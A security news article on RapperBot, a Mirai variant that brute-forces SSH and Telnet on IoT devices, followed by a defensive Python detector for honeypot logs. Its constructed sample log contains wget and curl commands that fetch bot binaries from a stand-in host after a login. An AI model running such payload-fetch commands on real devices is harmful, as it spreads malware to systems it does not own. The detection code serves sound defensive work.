New Mirai Version Spreads Malware Unconventionally

A new variant of Mirai dubbed RapperBot is a recent instance of malware attempting to propagate via less common or undiscovered attack channels.

RapperBot is a piece of IoT malware that was discovered a year ago and borrows extensively from the Mirai codebase while introducing significant new features.

Two of the changes that set it apart from other Mirai variants are a new protocol for its C2 connections and the ability to brute-force SSH servers rather than Telnet services.

Over the course of a year, Fortinet researchers observed the malware's developers making consistent updates, first by adding code that lets the infection survive a reboot of the compromised device, and then by adding code for self-propagation via a remote binary downloader.

Eventually, the malware's developers dropped the self-propagation capability and replaced it with a feature that gave them persistent remote access to the infected devices from which they brute-force SSH servers.

In the fourth quarter of 2022, Kaspersky researchers identified a variant of RapperBot capable of brute-forcing telnet servers as opposed to SSH.

According to Kaspersky's investigation, the malware also possessed an "intelligent" and relatively uncommon brute-force telnet capability.

The malware telnets to a device, evaluates the prompt it receives, and then selects which set of credentials to use in its brute-force attempt, instead of trying all of them.

According to Kaspersky, this makes brute-forcing passwords significantly faster than with many other malware programs.

According to Jornt van der Wiel, a senior security researcher at Kaspersky, "when you telnet to a device, you often receive a prompt." The information in that prompt is what RapperBot uses to decide which credentials to try.

He asserts that RapperBot's credentials vary based on the IoT device category being attacked.

Once it has logged in, the malware downloads its payload onto the target system using one of several methods, including wget, curl, and ftpget.
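As an added illustration of the behaviour described above (this is not code from the article or from the researchers it cites), the following Python example scans Telnet honeypot-style session events for the pattern a defender would look for: only a handful of credential guesses, then a successful login, then a payload fetch with wget, curl or ftpget. The log format, session ids, addresses and credentials are all constructed for this example.

```python
import re
from collections import defaultdict

# Constructed Telnet honeypot events (not real logs): "timestamp src session event detail".
SAMPLE_LOG = """\
2023-01-10T08:00:01Z 198.51.100.7 s1 login.failed root/example1
2023-01-10T08:00:02Z 198.51.100.7 s1 login.success root/example2
2023-01-10T08:00:03Z 198.51.100.7 s1 command wget http://203.0.113.9/bot.arm -O /tmp/b
2023-01-10T08:01:00Z 192.0.2.33 s2 login.failed admin/example1
2023-01-10T08:01:01Z 192.0.2.33 s2 login.failed admin/example2
2023-01-10T08:02:00Z 203.0.113.5 s3 login.success admin/example3
2023-01-10T08:02:01Z 203.0.113.5 s3 command uname -a
2023-01-10T08:03:00Z 192.0.2.44 s4 login.failed root/example1
2023-01-10T08:03:01Z 192.0.2.44 s4 login.failed root/example2
2023-01-10T08:03:02Z 192.0.2.44 s4 login.failed root/example3
2023-01-10T08:03:03Z 192.0.2.44 s4 login.success root/example4
2023-01-10T08:03:04Z 192.0.2.44 s4 command curl -o /tmp/b http://203.0.113.9/bot.mips
"""

LINE_RE = re.compile(r"^(\S+) (\S+) (\S+) (\S+) (.*)$")
DOWNLOADERS = {"wget", "curl", "ftpget"}  # fetch tools named in the article

def parse_events(log_text):
    """Group log lines by session id, preserving event order."""
    sessions = defaultdict(list)
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m:
            _, src, sid, event, detail = m.groups()
            sessions[sid].append({"src": src, "event": event, "detail": detail})
    return sessions

def find_targeted_bruteforce(log_text, max_failures=2):
    """Flag sessions with few failed guesses, then a login success, then a wget/curl/ftpget fetch."""
    hits = {}
    for sid, events in parse_events(log_text).items():
        failures, logged_in, fetch = 0, False, None
        for ev in events:
            if ev["event"] == "login.failed" and not logged_in:
                failures += 1  # guesses made before the first successful login
            elif ev["event"] == "login.success":
                logged_in = True
            elif ev["event"] == "command" and logged_in:
                tool = (ev["detail"].split() or [""])[0]
                if tool in DOWNLOADERS:
                    fetch = ev["detail"]  # first post-login download command
                    break
        if logged_in and fetch and failures <= max_failures:
            hits[sid] = {"src": events[0]["src"], "failures": failures, "fetch": fetch}
    return hits
```

The `max_failures` threshold separates the prompt-guided guessing the article describes from an ordinary dictionary attack, so tune it against your own honeypot's baseline before alerting on it.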
